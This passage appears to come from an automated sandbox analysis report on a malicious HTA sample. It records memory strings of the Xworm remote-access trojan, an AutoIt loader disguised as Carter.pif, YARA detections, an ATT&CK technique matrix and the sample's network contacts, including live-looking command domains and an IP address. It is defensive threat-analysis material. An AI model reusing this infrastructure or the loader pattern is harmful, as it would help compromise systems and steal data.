              Source: msword.exe, 0000000F.00000003.2182204354.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EE3000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000000.2208287854.0000000001096000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Carter.pif, DanielPulse.scrBinary or memory string: Shell_TrayWnd
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\dq@\dq'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedq$
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-dq
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100885B cpuid 28_2_0100885B
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01020030 GetLocalTime,__swprintf,28_2_01020030
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01020722 GetUserNameW,28_2_01020722
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0101416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,28_2_0101416A
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,15_2_00406805
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 3900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR
              Source: DanielPulse.scrBinary or memory string: WIN_81
              Source: DanielPulse.scrBinary or memory string: WIN_XP
              Source: DanielPulse.scrBinary or memory string: WIN_XPe
              Source: DanielPulse.scrBinary or memory string: WIN_VISTA
              Source: DanielPulse.scrBinary or memory string: WIN_7
              Source: DanielPulse.scrBinary or memory string: WIN_8
              Source: Carter.pif.19.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 3900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0105696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,28_2_0105696E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01056E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,28_2_01056E32
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,36_2_008A696E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,36_2_008A6E32
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Access Token Manipulation | 2 Software Packing | NTDS | 29 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | 2 Registry Run Keys / Startup Folder | 212 Process Injection | 1 DLL Side-Loading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 111 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 212 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (ID: 1575551, Sample: c2.hta, Startdate: 16/12/2024, Architecture: WINDOWS, Score: 100)
              Start
                DNS/IP: me-work.com; dwLscOsEZmpbOxr.dwLscOsEZmpbOxr; 2 other IPs or domains
                Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 18 other signatures
                mshta.exe 16 started
                  DNS/IP: myguyapp.com 193.26.115.21, 443, 49732, 49734 QUICKPACKETUS Netherlands
